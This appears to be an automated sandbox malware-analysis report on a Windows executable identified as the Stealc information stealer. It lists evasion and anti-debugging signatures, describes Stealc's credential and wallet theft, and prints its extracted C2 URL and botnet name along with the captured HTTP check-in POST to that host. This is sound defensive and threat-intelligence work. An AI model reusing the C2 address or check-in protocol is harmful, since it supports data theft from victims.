Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1558834
MD5:d90a0fa7d1b136c6aaa035f6bc5602fa
SHA1:1e236ca8b781f344a4738c1810b3c819ec72fac5
SHA256:136dfe4a8f2801c7836bb2518b2eb57142e57efb77a665830a00335fdfe0c2bd
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5940 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D90A0FA7D1B136C6AAA035F6BC5602FA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2116004330.0000000005160000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5940JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5940JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-19T21:02:10.401141+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.5940.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_007B60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_007D40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_007C6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_007BEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_007C6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_007B9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_007B9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_007B4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_007B7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007C18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007C3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007C1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007C1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007CE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007C4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007C4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007CCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007C23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007BDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_007C2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007BDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007CD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_007CDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007B16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007B16A0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJECHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 31 32 44 31 42 45 38 37 35 41 37 34 31 36 38 38 36 39 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="hwid"112D1BE875A74168869055------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="build"mars------AKJEGCFBGDHJJJJJKJEC--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,0_2_007B6C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJECHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 31 32 44 31 42 45 38 37 35 41 37 34 31 36 38 38 36 39 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="hwid"112D1BE875A74168869055------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="build"mars------AKJEGCFBGDHJJJJJKJEC--
              Source: file.exe, 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php3
              Source: file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpo
              Source: file.exe, 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.2067
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop,0_2_007B9770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF58970_2_00BF5897
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA90F10_2_00AA90F1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6B0DE0_2_00B6B0DE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D48B00_2_007D48B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B688550_2_00B68855
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E460000_2_00E46000
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B611D60_2_00B611D6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B702890_2_00B70289
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B62A4B0_2_00B62A4B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6F34D0_2_00B6F34D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B664F80_2_00B664F8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4649D0_2_00C4649D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5F5970_2_00B5F597
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B695F90_2_00B695F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B71D1B0_2_00B71D1B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B295700_2_00B29570
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACAD5B0_2_00ACAD5B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADDE240_2_00ADDE24
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A507A20_2_00A507A2
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 007B4A60 appears 316 times
